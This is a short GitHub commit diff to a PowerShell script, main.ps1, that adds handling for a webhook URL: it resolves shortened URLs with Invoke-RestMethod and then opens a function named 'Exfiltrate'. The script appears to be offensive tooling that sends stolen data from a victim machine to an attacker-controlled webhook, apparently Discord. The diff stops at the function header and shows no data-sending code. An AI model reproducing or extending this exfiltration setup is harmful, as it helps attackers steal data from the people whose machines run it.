Update main.ps1

This commit is contained in:
egieb
2024-01-02 21:48:38 +00:00
committed by GitHub
parent e34f10594b
commit 0ce9662339

View File

@@ -1,4 +1,8 @@
$hookurl = "$dc"
# shortened URL Detection
if ($hookurl.Ln -ne 121){Write-Host "Shortened Webhook URL Detected.." ; $hookurl = (irm $hookurl).url}
Function Exfiltrate {